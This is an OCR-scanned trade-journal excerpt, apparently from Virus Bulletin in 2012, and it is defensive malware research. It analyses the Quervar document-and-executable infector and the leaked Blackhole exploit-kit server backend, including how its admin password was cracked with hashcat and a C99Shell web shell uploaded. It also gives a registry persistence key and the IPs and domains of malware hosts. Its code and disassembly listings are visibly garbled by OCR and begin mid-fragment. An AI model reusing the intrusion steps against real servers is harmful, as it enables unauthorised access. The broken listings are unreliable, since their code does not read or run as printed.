finished, 0, pbBuffer, &dwByt e Count, 

OUT_BUFFER_SIZE); 

// Write the encrypted/decrypted data to the 
output file. 

fResult = WriteFile(hOutFile, pbBuffer, 
dwByteCount, 

&dwBytesWritten, NULL); 

} while ( !finished) ; 

_tprintf(_T("File %s is encrypted successfully!\n")); 

} 

/* Cleanup */ 

if (hlnFile != INVALID_HANDLE_VALUE) 

CloseHandle(hlnFile); 

if (hOutFile != INVALID_HANDLE_VALUE) 

CloseHandle(hOutFile); 

if (hSessionKey != NULL) CryptDestroyKey(hSessionKey); 
if (hHash != NULL) CryptDestroyHash(hHash); 
if (hProv != NULL) CryptReleaseContext(hProv, 0); 


MALWARE ANALYSIS 2 

FILENAME: BUGGY.COD.E 

Raul Alvarez 
Fortinet, Canada 

We are so focused these days on analysing advanced 
persistent threats, spamming trojans, phishing scams, 
fake AV, and everything in between, that I wondered for a 
moment whether viruses had stopped infecting documents. 

But just a few weeks ago, we heard about a piece of 
malware that infects documents and executable files at the 
same time. 

We know all about the old macro viruses that infect 
documents and spreadsheets through Visual Basic scripts, 
but we seldom hear of binaries infecting documents directly. 
Labelled with many names including Quervar, Dorifel, 
and XDocCrypt, this virus infects both documents and 
executable files. In this article we will look at what is really 
happening during the infection process and describe the 
flaws of the malware’s execution. 


CHECKING THE RIGHT DRIVE 

The virus tries to maintain a low profile by being 
meticulous about selecting the drive that it wants to infect. 
It doesn’t infect files in the root directory of the machine 
and prefers to look for remote drives mapped to the 
system. 

It checks for the available drives in the system and avoids 
the CD-ROM drive (code = 5), DRIVE_NO_ROOT_DIR 
(code = 1), and DRIVE_UNKNOWN (code = 0) by getting 
the drive type information using the GetDriveTypeW 
API. It also avoids drives containing the ‘System Volume 
Information’ folder - a hidden folder normally found in the 
root directory, for example, in drive C. When all of these 
conditions have been satisfied, one of the possibilities left is 
that the drive is a remote one. 

After determining that the drive is a network drive or a 
mapped drive, the virus starts by enumerating all available 
files in the folder. It looks for files with extension names 
such as .DOC, .XLS, and .EXE. Figure 1 shows a snapshot 
of the code that checks for the file’s extension name. We 
instantly recognized that the virus is looking for documents 
and executable files. 


.EXE FILE INFECTION 

If the extension name is .EXE, the virus checks if the file 
is an executable by calling the GetB inary Type W API. If it 
is an executable, it loads the binary file into memory, then 



OCTOBER 2012 


11 



VIRUS BULLETIN www.virusbtn.com 


- <JMP.&kernel32.1strlenU> 

1 MOU ECX,EAX 



MOU EDX, ANSF4U.0040D898 

MOU EAX,EBX 
| CALL ANSF4W.0040030 

DEC EAX 

► JLE SHORT ANSF4U.0040D71C 

PUSH EBX 

. CALI < JMP.8ckernel32 . lstrlenU> 

1 MOU ECX,EAX 

UNICODE 

".doc" 

1 MOU EDX,ANSF4U.0040D8A4 
l MOU EAX,EBX 

CALL ANSF4U.0040C830 

INC EAX 

I JNZ SHORT ANSF4U.0040D71C 

XOR EDX,EDX 
\ MOU EAX,EBX 
> ANSF4W.0040D48C 

PUSH EBX 

\ CALL <JMP.&kernel32.1strlenW> 

1 MOU ECX,EAX 

UNICODE 


MOU EDX, ANSF4U.0040D8AC 
; MOU EAX,EBX 

ANSF4W.0040C830 

DEC EAX 

1e SHORT ANSF4W.0040D753 

PUSH EBX 

b CALL < JMP.8ckernel32 . lstrlenU> 

MOU ECX,EAX 

UNICODE 

".xls" 

MOU EDX, ANSF4U.0040D8A4 

MOU EAX,EBX 

CALL ANSF4U.0040C830 
t INC EAX 

l JNZ SHORT ANSF4U.0040D753 
f MOU DL,i 
► MOU EAX,EBX 

CALL ANSF4U.0040D48C 

UNICODE 


MOU EDX, ANSF4U.0040D8B8 

MOU EAX,EBX 

ANSF4U.0040D040 

UNICODE 

".exe" 


Figure 1: Snapshot of the code that checks for the file’s 
extension name. 


closes the file. (It will use the memory version of the file for 
further processing.) 

It parses the whole binary file from memory, searching 
for the marker ‘[+++scarface+++]’, byte by byte, until it 
reaches the end of the file. If the marker is not found, it 
proceeds to load Quervar into memory and copies it to a 
temporary file in the %temp% folder with a random name. 
Then it loads the victim file into memory and encrypts it. 

Afterwards, Quervar allocates enough memory to hold the 
virus body, the marker, and the encrypted victim file. It will 
use the collected binaries to overwrite the content of the 
original victim file on the remote drive. 

The temporary file, used by the malware in the %temp% 
folder, is deleted after a successful infection of the binary 
file. 

The next time the virus checks for this .EXE file, it will 
skip the infection process when it finds the infection marker 
‘[+++scarface+++]\ The filename of the .EXE file remains 
the same after infection. 

.DOC AND .DOCX FILE INFECTION 

Files with the .DOC and .DOCX extension are normal 
document files. We assume that Quervar targets these 
documents specifically. Let’s look at how it does this: 


If the extension name is .DOC, there is no check for a 
marker from within the file. The malware proceeds to load 
Quervar into memory and copy it to a temporary file in the 
%temp% folder with a random name (as with the .EXE 
infection). Then, it loads the victim file into memory and 
encrypts it. 

Afterwards, the virus allocates enough memory to hold 
the virus body, the marker, and now, the encrypted .DOC 
file. Then it will overwrite the victim document file with 
the contents of the memory containing the virus and the 
encrypted host file. 

It will attempt to rename the .DOC file to 
<Filename>.COD.SCR (the .DOC extension is reversed 
to .COD) using a call to the MoveFileW API. There is no 
check as to whether the new name already exists. If the 
new filename does already exist, the MoveFile operation 
will fail. (Later, we will discuss what happens once the 
renaming fails.) 

Files with the .DOCX extension will also be infected, but 
not because they are document files. The main reason is 
that the malware only checks for the first three characters 
of the extension name. No matter what characters 
exist after the .DOC string, the file is still considered a 
candidate for infection. Below is a list of some of the 
filenames that can be infected by the malware (‘TEST’ is 
just an example filename, any name will do): 

• TEST.DOC 

• TEST.DOCX 

• TEST.DOC 1 

• TEST.DOC 12345 

• TEST.DOC099787 

• TEST.DOCQWERTY 

They will all be renamed to TEST.COD.SCR (the format is 
<Filename>.COD.SCR). 

Any file whose first three extension characters are .DOC 
can be infected. If you rename a database file, a screensaver 
file, an icon file, an image file, or any other file with the 
.DOC extension, there is a high chance that they can be 
infected. 

.XLS AND .XLSX FILE INFECTION 

Spreadsheet infection is similar to the .DOC infection. 
Once again, the virus just looks at the first three 
characters of the extension name - thus it can also infect 
any file whose extension starts with .XLS, regardless of 
any other characters that follow. When the infected file 
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ransom. If you were not aware that 
the file was infected and double 
clicked or executed the infected file, 
the virus would run in the background 
and would show you the original 
file opened with the associated 
application. 
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Figure 2: Content of an infected file. 


is renamed by the virus, the filename will be 
<Filename>.SLX.SCR. 

INFECTED FILES 

The file structure of the infected file is as follows: the main 
virus is at the very beginning of the file, while the marker, 
‘[+++scarface+++]\ and the encrypted victim binary are at 
the end of the file. 

Infected files are easy to detect due to the nature of infection 
- the virus codes are similar in all infections including the 
original mother virus. Figure 2 shows the content of an 
infected file with the partial view of the malware above the 
partial view of the encrypted host separated by the string 
‘[+++scarface+++]\ The encrypted victim binary can be the 
original executable file, document file, spreadsheet file, or 
any other file. 

The string 4 [+++scarface+++] ’ also serves as the marker to 
avoid reinfection in .EXE files. The encrypted version of 
this string is ‘[+++fpnesnpr+++]’, which can be found in 
the virus body. 

NOT RANSOMWARE 

Quervar doesn’t seem to hold the encrypted file for 


OVERSIZE 

Here is one of the interesting parts 
about the virus: if there are two 
document files with the same filename 
but different extension names, e.g. 
TEST.DOC and TEST.DOCX, they can 
both exist in the same folder without 
any problem. 

When Quervar looks for files in the 
drive with the same filename but 
different extension names (e.g. 
TEST.DOC and TEST.DOCX), it 
will infect the TEST.DOC file first 
and rename it to TEST.COD.SCR. 
There should be no problem with the 
process. 

However, when it tries to apply its 
infection routine to TEST.DOCX, renaming the file will 
fail: the new name for TEST.DOCX will be 
TEST.COD.SCR, which already exists because of the 
previous infection of TEST.DOC. When the renaming 
fails, the original filename TEST.DOCX will remain 
- the file is now infected. The next time the virus searches 
in the remote drive, it will see the TEST.DOCX file in 
the folder and start the infection routine again. There is 
no internal check as to whether the document is already 
infected. 

In our tests, the TEST.DOCX file size grew from 12KB 
to 30,795KB following infection. Figure 3 shows the 
document files before and after infection. The good news 
is that the infection seemed to stop once the document 
file reached 30,795KB. (This could be a limitation on our 

Name Size Type 

3 test.doc 27 KB Wordpad Document 

Qtest.docx 12 KB DOCX File 

Name ^ Size Type 

j|test.docx 30,795 KB DOCX File 

testD cod, scr 172 KB Screensaver 

Figure 3: Document files before and after infection. 
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machine or network, but at least it seems as if it would not 
consume your hard drive overnight.) 

It should also be noted that the machine we used for testing 
didn’t have Microsoft Word installed. Prior to infection, 
the icon for TEST.DOC was the WordPad document icon 
and there was no associated icon for TEST.DOCX. After 
infection however, the infected version of TEST.DOC 
(TEST.COD.SCR) had the Word icon (even though it has a 
screensaver extension). 

OTHER MALICIOUS ACTIVITIES 

1. It creates an event named 
‘SayHellotomyLittleFriend’. 

2. It adds a global atom string named ‘BreakingBad’ 
to tell the malware that it has already run on the 
system. The atom table contains global character 
strings, called ATOMs, which are used by 
applications like a global constant value. 

3. It creates a file in ‘%AppData% \[six random 
characters]’ named ‘[6-random charactersl.exe’. 

4. It creates a file in ‘%AppData% \[six random 
characters]’ named ‘[6-random characters].exe.Ink’. 

5. It creates a file in ‘%AppData% \[six random 
characters]’ named ‘[six random characters].exe.ini’. 

6. It creates/modifies a registry entry (to enable itself to 
run after restarting the computer): 

Key = HKEY_CURRENT_USER\Software\Microsoft\Windows 
NT\CurrentVersion\Windows 

Value = load 

Data = "%AppData% \[six random characters]" named 
"[six random characters].exe.Ink". 

WRAP UP 

Quervar has proven that there are lots of ways a malware 
author can use the files from your machine - regardless 
of whether those files are documents, executables, 
database files, or any other files. Although the malware 
still looks very new, the addition of a polymorphic 
engine and more checking of its malicious code is likely 
to give us greater headaches in the future. Adding more 
checking on the documents that it attempts to infect (i.e. 
not just the extension name) will make it more resilient to 
detection. 

By learning its methodologies, anti-virus researchers can 
develop stronger protection for the files residing in our 
computer. 


FEATURE 1 

INSIDE A BLACK HOLE: PART 1 

Gabor Szappanos 
Sophos, Hungary 

The most actively deployed exploit kit over the past year 
has without doubt been the Blackhole exploit kit. New 
mass-attacks have been performed daily using various initial 
distribution methods and a supporting server backend. 

While several aspects of these attacks have already been 
covered in great detail [1], the interaction with and the 
role of the backend in the attacks has not been explained 
satisfactorily. This paper attempts to fill in the (black)holes 
in our knowledge about this particular threat. The first part 
covers how the server-side code could be analysed, while 
the second part will discuss the operation of the backend in 
detail. 

The kit itself has been updated regularly over the past two 
years, as shown in Table 1. 


Version 

Release date 

2.0 

09/2012(7) 

1.2.5 

30/07/2012 

1.2.4 

11/07/2012 

1.2.3 

28/03/2012 

1.2.2 

26/02/2012 

1.2.1 

09/12/2011 

1.2.0 

11/09/2011 

1.1.0 

26/06/2011 

1.0.2 

20/11/2010 

1.0.0 (beta) 

08/2010 


Table 1: Release history of the exploit kit. 


The analysis in this paper is based on version 1.0.2, which 
is certainly one of the older versions of the exploit kit, but 
which has the overwhelming advantage of being available. 
None of the later versions are known to be available 
in wider circulation (i.e. wider than its author and the 
purchasers) in the research community. When I started 
this work, my main concern was that analysing a version 
from over a year ago would not give results that would be 
applicable to current threats. As it turned out, the code did 
not change too much structurally, and provided valuable 
insight into the anatomy of the current attacks as well. In 
fact, very few characteristics have been observed in the 
current attacks that feature more than the 1.0.2 architecture 
could service. 
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BACKEND 

The Blackhole backend is available to purchase or rent from 
its author(s). The author(s) advertise the pricing scheme as 
follows: 

Annual license: $1500 
Half-year license: $1000 
3-month license: $700 

Update cryptor $50 

Changing domain $20 multidomain $200 to license. 
During the term of the license all the updates are free. 

Rent on our server: 

1 week (7 full days): $200 

2 weeks (14 full days): $300 

3 weeks (21 full days): $400 

4 weeks (31 full days): $500 
24-hour test: $50 

There is restriction on the volume of incoming traffic to a 
leasehold system, depending on the time of the contract. 

Providing our proper domain included. The subsequent 
change of the domain: $35 

No longer any hidden fees, rental includes full support for 
the duration of the contract. 

A lot changed in the world between the announcement of 
the 1.0.0 version in August 2010 and the 2.0 version which 
is being promoted for upcoming release at the time of 
writing this article. The good news for readers is that the 
pricing has remained the same, unaffected by inflation, oil 
prices or the global economic crisis. It is reassuring to know 
that there are some things in this ever-changing world of 
ours that retain their value. 

The server-side components of exploit kits are usually hard 
to obtain. Occasionally law enforcement bodies can seize 
the C&C servers including the installed software, but these 
sources are not likely to surface for general availability. 

For this reason it was surprising to see that in May 2011 
(the earliest report was 22 May [2]) a leaked version of 
the Blackhole exploit kit appeared on underground forums 
and torrent sites. Security experts speculated that this 
could lead to a flood of alternative exploit kits based on 
the modification of the source [3]. Fortunately, this did not 
happen - a reason for which will become clear after reading 
this paper. 

I could easily accept the lack of new clones of Blackhole, 
but from a malware researcher’s point of view it was 
disturbing that despite the source code having been available 
for such a long time, there was still no comprehensive 
analysis available. Certainly, there must be a reason for that. 


How was the source code obtained? 

Before going into the details of the complexities of the 
analysis, another very important question came up: how 
was this code obtained in the first place? There is no 
first-hand information available, but putting together some 
of the observations and connecting the dots could lead to a 
reasonably strong explanation. 


blackhole 

File Folder 

J \it 1.0.2 

File Folder 

t> £ lib 

File Folder 

_ adm.php 

62 KB php File 

l_ i config.php 

2 KB php File 

nl.nhn 

Fi|p 


File Folder 1 

1 27 

131 KB File 


^NT^RIaer 

* jt games 

File Folder 

□ hcp.php 

4 KB php File 

_ hcp_asx.php 

2 KB php File 

_ hcp_vbs.php 

3 KB php File 

javaobe.jar 

6 KB jar File 

M i-gif 

43 bytes gif File 

_ pclf.php 

6 KB php File 

D pdf2.php 

24 KB php File 

indec.php 

39 KB php File 

j stat.php 

1 KB php File 


Figure 1: The main clue. 


The leading clue was a file named ‘27’ in the files directory. 
We know from analysis of the backend code that this is the 
file upload directory, to which new executable payloads can 
be uploaded for distribution to the infected endpoints. 

However, this file was something different. It was not a 
botnet executable or a key logger installer, as one would 
normally expect, but a copy of the infamous C99Shell 
backdoor, which is a popular choice for hacking into 
websites. One could argue that this could be an intended 
payload for some infected systems, but the payload from the 
file directory is always delivered with an .exe extension and 
‘application/x-msdownload’ content type - the system is not 
set up to deliver a PHP script. The file 27 is a foreign body 
within the Blackhole code complex. 

Additionally, there is a related directory, dir27, which 
contains an index.php file. All directories in the hosting 
server contain this file, which displays a standard 404 error 
message to disable directory browsing. However, unlike 
all of the other index.php files, this one is not protected 
with ionCube. Analysis of the code shows that the file 
was probably created dynamically at runtime, and thus 
install-time protection was not applicable. 
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Evidence suggests that the site was hacked by uploading 
C99Shell. Using it, the attacker gathered all files from the 
Blackhole home directory. Presumably the hacker did not 
gain access to files outside this directory (or had no idea 
about the structure of the set-up, and did not bother to 
grab other files from the server), as the files outside this 
home directory (most importantly the MySQL database 
files) were not retrieved. Having the database could have 
been a great help in understanding the internals of the 
operation. 

But before reaching this point, there was an initial hurdle 
to jump. The exploit kit provides the option to upload files, 
but only after admin authentication. So in order to hack 
into the server, the attacker had to gain access to the web 
admin interface. How was this possible? It all became clear 
after having a quick look at the code: the config.php file 
contains, among many other general settings, the MD5 
hash of the admin password. It is considered to be a safe 
approach to store only the one-way hash of the password 
(though even in that case MD5 is not the advisable 
choice for the hash algorithm), and on authentication the 
calculated hash of the submitted password is compared 
with the stored hash. What should not be considered safe 
under any circumstances is the password itself. Figure 2 
demonstrates that using a common password-cracking 
tool and an even more common password list, a dictionary 
attack was able to break the password in about 310 
milliseconds. Not surprisingly, the password used for the 
admin interface can be found in just about every password 
list available on the Internet. To give you a hint, it was 
as good a choice for a password as 12345 (which is not 
the actual password, but close enough, the Levenshtein 
distance from the real one is only 2). 


C:\run\hashcat-0.40>timer hashcat-cli32.exe admin password.1st 
Initializing hashcat V0.40 by atom with 8 threads and 32mb segment-size... 

NOTE: press enter for status-screen 

Added hashes from file admin: 1 (1 salts) 

Act i or ^^^yy^hash 

All hashes have been recovered 

End = 15:13:37.07 

Start = 15:13:36.76 

Hours = 0 

Minutes = 0 

Seconds = 1 

Total = 1 


Figure 2: Admin password cracked within a fraction of a 
second. 

So my educated guess for the method of obtaining the 
source is the following: the attacker identified a Blackhole 
attack, then traffic or static analysis led to the C&C server. 
Then came a tricky bit: finding out the login filename 
leading to the admin interface, which was the guessable 
adm.php. However, a more easily guessable file (and the 
one commonly used in exploit kits), stats.php, redirects to 
the admin page. I have no data to support the suggestion 


that the attacker knew about this, or could decode Russian, 
but there were screenshots available of the 1.0.0 version 
admin panel, which could have given the attacker a clue as 
to the filenames. 

Having figured that out, the attacker could gain access to 
the admin interface and in somewhere between five and 
50 attempts guessed the admin password. After that the 
attacker uploaded the C99Shell file, directly accessed it in a 
browser, which gave access to the files within the Blackhole 
home directory. Mental note: if you maintain a C&C server, 
use a strong password. 

There is also a clue regarding where this particular server 
was originally located. Blackhole kits use (among others) 
Java components for downloading the Win32 binaries, and 
these Java components were linked into the HTML page 
returned by the server during the attack. 

In the specific server set-up (defined in config.php and used 
in the main downloader generator file, index.php, when 
dynamically creating the downloader script), the path to this 
component was set to 195.80.151.59\pub\new.avi. 

Storing these JAR files in the /pub directory was common in 
early 2011 Blackhole attacks. This file was not found in the 
leaked source for the obvious reason that it was not present 
in the kit’s home directory. 

Despite the .avi extension, the components used this way 
were in fact JAR files. The actual usage varied during the 
observed period, with two main tendencies: they were 
either referenced from the main download HTML page 
in an <applet> tag, with full URL (the more common 
approach in the analysed sample set), or from within the 
encrypted main script, dynamically creating the applet 
with createElement and assigning the relative or absolute 
path within the server home to the archive attribute. Server 
code analysis revealed that in this particular case the URL 
to the Java component was used from within the encrypted 
main code - fortunately this time the full URL version was 
configured. 

What was found in all analysed cases was the fact that the 
JAR was referenced from the same server as the one that 
hosted the exploit kit, never pointing to an external server. 
This leads us to the conclusion that the cracked server was 
in fact 195.80.151.59. 

This IP was known to host various malware back in 
February 2011 (though not Blackhole, but the Phoenix 
backend was reported), then under domain name 
tuqidig5.co.cc (and a few others, like dubezov3.co.cc, 
gube2qome8.cz.cc, cepepeler28.co.cc and 
dofubuhud57.co.cc were listed with the same IP), registered 
to a company located in Belize. Nowadays it belongs to a 
Polish ISP and is unrelated to malware. 
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Figure 3: Server config including crucial script names. 


ABOUT IONCUBE 

Most of the server backend code is encrypted with the 
commercial ionCube encoder [1], which is one of the 
most popular PHP encryptors. It has a rich set of features, 
including: 

• Encoding of PHP scripts with compiled byte codes 
for accelerated runtime performance and maximum 
security. 

• Obfuscation of byte codes after compilation for extra 
security. 

• Selectable ASCII or binary encoded file format. 

• Prevention of file tampering through use of digital 
signatures. 


• Prevention of unauthorized files including encoded 
files. 

• Generation of files to expire on a given date or after a 
time period. 

• Restricting of files to run on any combination of IP 
addresses and/or server names. 

• Restricting of files to run on specific MAC addresses. 

• Customized messages when files expire or don’t have 
permission to run. 

• Fast encoding. 

The obfuscation of byte codes includes a few methods to 
protect against reverse engineering. These are illustrated in 
Figure 4: 
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• Obfuscation of local variables 

• Obfuscation of function names 

• Obfuscation of line numbers. 

Of those the obfuscation of function names has the most 
devastating effect on the readability of decrypted code, as 
we will see later in the paper. 



Figure 4: Obfuscation settings. 

The cryptor uses the technique of compiling to byte code 
prior to encoding, consequently source code is eliminated 
and runtime overheads are reduced. A PHP extension called 
the ionCube Loader , provided for all supported platforms, 
handles the preprocessing and execution of encoded files at 
run time. 

The popularity of the cryptor is demonstrated by its 
prevalence among the exploit kits. Going through a 
moderate collection of 55 different exploit kits it was 
somewhat surprising that only nine of them were protected 
with any kind of PHP encryption, and six of them used the 
ominous ionCube. 


However, those using ionCube have not benefited from the 
highest security services provided by the cryptor. Table 3 
summarizes the usage of restricted domains and function 
name obfuscation among these exploit kits. (The lack of 
data for PayOc is the consequence of using a new version of 
ionCube , not supported by the available analysis tools.) 


Exploit kit 

Restricted 
domain count 

Function name 
obfuscation 

Intoxicated 

3 

No 

Blackhole 

28 

Yes 

Bleeding-life-pack 

2 

No 

Crimepack 

1 

No 

PayOc 

N/A 

N/A 

Yes 

- 

Yes 


Table 3: ionCube feature utilization. 


Only Blackhole and Yes featured function name 
obfuscation, which is a very effective way to protect against 
reverse engineering. And Yes does not benefit from domain 
restriction, which is a good defence against illegal use 
(as controversial as it sounds, referring to a tool used in 
computer crimes) on unauthorized servers. Running it on 
an inappropriate server will result in error messages such as: 

The encoded file C:\Program Files\EasyPHP\www\ 
blackhole\index.php is not permissioned for 127.0.0.1 
in Unknown on line 0) 

Table 3 also underlines my introductory claim that 
Blackhole is the most widely deployed attack kit. While 
the examined versions of the other kits were deployed on 
between one and three servers, Blackhole was licensed for 
use on 28! Quite a success story. 

IONCUBE IN ACTION 


Exploit kit 

Cryptor used 

Adrenalin 

Zend 

Blackhole 

ionCube 

Bleeding life 

ionCube 

Crimepack 

ionCube 

Intoxicated 

ionCube 

Liberty 

Php Express 

PayOc 

ionCube+custom 

Tornado 

Zend 

Yes 

ionCube 


Table 2: PHP cryptor usage on exploit kit server sides. 


The ionCube encoder strips the comments from the code 
then converts the remaining code to byte code, encrypts it 
based on the selected protection settings, and prepends a 
short and static loader code. This checks the availability of 
the ionCube loader, and if it is found, hands the script to the 
loader. 

The loader then checks the validity of the licence and 
whether it is running on the server it is licensed to. If all 
checks pass, it decrypts and loads the byte code into the 
PHP interpreter. 

The original code: 

<?php 

### This file is part of the dictionaries-common 
package. 
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### It has been automatically generated. 

### DO NOT EDIT! 

$SQSPELL_APP = array ( 

'American English (aspell) 7 => 'aspell -a -d en_US 
'British English (aspell) 7 => 'aspell -a -d en_GB 
'Canadian English (aspell) 7 => 'aspell -a -d en_CA 
'English (aspell) 7 => 'aspell -a -d en ' 

) ; 

is thus transformed into a far less comprehensible form: 

<?php //0035e 

if(!extension_loaded('ionCube Loader 7 )){$_ 

oc = strtolower(substr(php_uname() ,0,3)) ;$_ln= 7 / 

ioncube/ioncube_loader_ 7 . $_oc. 7 _ 7 .substr(phpve 

rsion() ,0,3) . (($_oc = = 7 win 7 )? 7 .dll 7 : 7 .so 7 ) ;$_ 

oid=$_id=realpath(ini_get('extension_dir 7 ));$_ 

_here=dirname(_FILE__) ;if(strlen($__id)>1&&$_ 

id[1]= = 7 : 7 ){$_id=str_replace('\\ 7 , 7 / 7 ,substr($_ 

_id,2));$_here=str_replace('\\ 7 , 7 / 7 ,substr($_ 

here,2)) ;}$_rd=str_repeat('/..',substr_count($_ 

id, ' / ' )) . $_here . 7 /' ; $_i=strlen ($_rd) /while ($_i- 

-){if($_rd[$__i]== 7 / 7 ){$_lp=substr($_rd,0,$_ 

i) . $_In; if (file_exists ($_oid. $__lp) ) {$_ln=$_ 

lp;break; }} }@dl ($_In) ; }else{die ('The file '._FILE_ 

is corrupted.\n");}if(function_exists('_il_ 
exec 7 )) {return _il_exec ();} echo (' Site error: the file 

<b> 7 ._FILE_. 7 </b> requires the ionCube PHP Loader 

'.basename($_In). 7 to be installed by the site 

administrator. 7 )/exit(199); 

?> 

4+oV584oGn8WlxWbEOlMCSe7+5xpGsdDrOUqMyicg6oxyLZbl6Blu 

FQpCr+D7yMqMhqOmkX4yABG 

UKwVZfc7Fa3 3Xop85AWlurwO+VnDpnXgCG9sXDOnOC9ZY83 9Z9tlr 
Q 51 DwpUkxvO 3 8 8 z FwJnhL 81 

HFJiu3BxAvnoJ7SbPDuE/JOj qlPvzQJubQ0 0n2i0qucXQ 
Wp4DqGIIdbqPlGoaFrwVjVK80KM9uCO 

4VYWKfNPrKgeOzYLfqROaektFtx8m/ 

TYNAwAyABKV3 74GJ7NzOTcbJengE6 + 2vmu83Pj yIDH/7Y1 

fAtoE+RRFefDKlnBdZzPrvtowt/2 81w8ZQQaFaBK/P9IqxFIg/ 
IXH8kXIuXtPAMNPNNVhKMoiLhO 

Zi3 scRC8k2Ez3KQZUb5LSOj j M+hQNyrRVhj OaOs t j GTYbV6DvNoQk 
kMZDusxcYe/13 fXTw5 8 +nCb 

w+7W5H32VXXm3j uURlSovZOqej y7Vs/DqhdLlr/ 
+SIOSGHlw7BKZUc+Y8g9NtInkpUWBaf5r3CZF 

SqOXitNW/EZopkHyT6SNoFSXnLmEtvEINqJBrkR5zNeDutXgcZ4 
sp3rPZ8kTiDEQ9mgjiDleJcXp 

Dfw/c6/vNnjwAcSLzzYQUwLrvC55FREiVksS 

DECODING IONCUBE 

Despite all the transformations and obfuscation that it 
performs, decoding ionCube is not entirely hopeless. But 
then again, it is not entirely easy to solve either. 

There are a few tools available that are reasonably 
successful in reconstructing the original source. At least that 
is true for the simple cases. 


One of the most usable ones is ionCube Decoder , written in 
Visual Basic. It decodes the above example script into the 
following form: 

<?php 

$SQSPELL_APP=array("aspell -a -d en_US ", "aspell 
-a -d en_GB ", "aspell -a -d en_CA ", "aspell -a 
-d en "); 

Return (1); 

?> 

Decoded with ionCube decoder. 

According to my tests, the most promising output is created 
by another tool, called Dezender, which outputs a more 
correct source: 

<?php 

/*********************/ 

/* */ 

/* Dezend for PHP5 */ 

/* NWS */ 

/* Nulled.WS */ 

/* */ 

/*********************/ 

$SQSPELL_APP = array ( "American English (aspell) 77 => 
"aspell -a -d en_US ", "British English (aspell) 77 
=> "aspell -a -d en_GB ", "Canadian English 
(aspell) 77 => "aspell -a -d en_CA ", "English 
(aspell) 77 => "aspell -a -d en " }; 

?> 

Decoded with Dezender. 

The difference may not be that obvious from this very 
simple code sample, but when dealing with the real server 
code, the shortcomings of ionCube Decoder turned out to 
be numerous: 

• It failed to decompile if the input file had other than 
Unix-style line breaks (0x0a). 

• It crashed consistently on a couple of files. 

• On some occasions the code was truncated. 

• The resulting decompiled code was a lot more 
challenging to read in the case of ionCube Decoder 
than in the case of Dezender. 

As an example, the following is the form of the code 
generated by Dezender. 

_obfuscate_DVwqWwoiNxQrDDcnLgEOMgkuDREiWxEy( 
"display_errors 77 , 1 ); 

_obfuscate_DTAWFiwpFRcvMSo8LSEJDQc7JS44DwEy( E_ALL ); 
$configFileName = "config . php" ; 

_obfuscate_DS0eLQwlWwE0Ly4nPiopNzgiCyENEiIy( ); 
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It was a lot easier to analyse and post-process than the 
(in this case admittedly equivalent) form provided by 
ionCube Decoder. 


[Obfuscated] 0D 

5C 

2A 

5B 

0A 

22 

37 

14 

2B 

OC 

37 

27 

2E 

01 

34 32 09 2E 0D 

11 

22 

5B 

11 

("display_errors" 

,1) ; 



[Obfuscated] 0D 

30 

16 

16 

2C 

29 

15 

17 

2F 

31 

2A 

3C 

2D 

21 

09 0D 07 3B 25 

2E 

38 

OF 

01 

(1) 

; 








$ configF i 1 eName = 

:"config 

f.php" ; 










[Obfuscated] 0D 

2D 

IE 

2D 

OC 

35 

5B 

01 

34 

2F 

2E 

27 

3E 

2A 

29 37 38 22 0B 

21 

0D 

12 

22 

0 ; 










Having said all that, ionCube Decoder has one definite 
advantage over Dezender. it identifies and interprets the 
settings data stored in the header of the decrypted block, 
thus providing useful meta-information about the exploit 
packs, revealing some of the settings used during the 
creation of the package. As an example, in the case of the 
particular Blackhole installation, the following set of data 
was revealed: 

Minimum Loader Version: 00.00.00 (for ex. ioncube_ 
loader_win_4.3.dll requires >0301010) 

VerData 0x00000003 
ObfuFlags 00000003 00000000 

0x0001 Obfuscate Vars 
0x0002 Obfuscate Funcs 

ObfuFuncHashSeed: FF 29 24 50 76 F6 A4 13 77 0D 5E 38 
79 9F 8F C2 

Bytecode_XorKey: 01806081 

IncludeXorKey[should be 0xE9FC23Bl]: E9FC23B1 
DisableCheckingOfLicenseRestrictions: 0 
CustomErrCallbackHandler: ' _event_handler 7 

Enable_auto_prepend_Append_file: 0 
Customised error messages entries: 0x00 
Include file protection entries: 0x00 
Server restrictions entries: OxlC 
#1 Domains: ajaxstat.net / 

#28 IPs: 195.80.151.59_NetMask (255.255.255.255), / 

Adler32_CRC for '<?php //... ?>' and calculated 
MATCH. CRC: EB60391D 

IC_HeaderEx start: 01E7 

IC_HeaderEx end: 02OF IC_Header HeaderSize: 02IF 

Among many others, the highlighted lines provide 
information about the selected obfuscation methods 
(variables and functions) and the list of the server 
restrictions. 

As it seems, it is a widely implemented pack - this 
particular compilation was supposed to serve 28 different 
sites, most of them specified by IP addresses in very distinct 


IP ranges. Reassuringly, the IP address 195.80.151.59 
- from which we claimed earlier that the kit was stolen - is 
present on the list. 

The listing contains the obfuscation hash seed for the 
function name, but as of writing this article, the exact 
algorithm for gaining it from the password was not 
identified. It is likely to be some form of a salted MD5 
generated from the selected obfuscation password. 

All in all, none of the available tools can produce a 
runnable source from the original, but they provide enough 
information to start the analysis. 

RECONSTRUCTING THE CODE 

The code snippets from the previous section already 
illustrate that there is a huge problem when ionCube 's 
encrypting of functions option is selected. The PHP library 
names are replaced with a one-way hash generated from the 
function name perturbed by the obfuscation key [4]. 

Since the obfuscated names depend on the selected 
password these are usually different between ionCube 
installations, therefore no useful cross-reference table is 
available. 

This is about the point that all available sources found on 
the Internet reached: they have the decompiled code with 
unrecognizable function names. The most complete (but 
still only a small step away) result was found on the site 
v0nsch311ing.tistory.com. Here, a handful of function names 
were guessed, though some of them incorrectly (see the 
moderately readable Figure 5). 


//vOn Schilling 

//comparelP function may be generated by ionCube PHP Encoder 
//if $good ==true, allow access 
//else $good == false, do not access 
'Ublic static function comparelP( $ip, $mask ) 

//v0nSch3lling 

//_o bf u s c ate _D R k9FT0f Ay wxO Q 5b Q D Q B B x AB W wU kQ AE == split 
$arr = _o bf u s c ate _D R k9FT0f Ay wxO Q 5b Q D Q B B x AB W wU kQ AE ■ ( V, $ip ); 
$arr2 = _obfu scats _DRk9FT0f Ay wxOQSbQDQBBxABWwUkQAE-( $mask ); 

$good = true; 

$i = a 

//v0nSch3lling 

//_obfuscate_DRAxBQwdBxskCygsEhQtlzAOJBUtNAE == count 
while ( $i < _obfuscate_DRAxBQwdBxskCygsEhQtlzAOJBUtNAE-( $arr) ) 


Figure 5: Documented, decoded' source. 

This ‘documented’ source was later picked up and quoted in 
a few available Blackhole analyses [5]. 

The obfuscated function names efficiently prevented 
further analysis. But we don’t necessarily have to stop 
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here. If enough effort is invested, a lot more results can be 
achieved. 

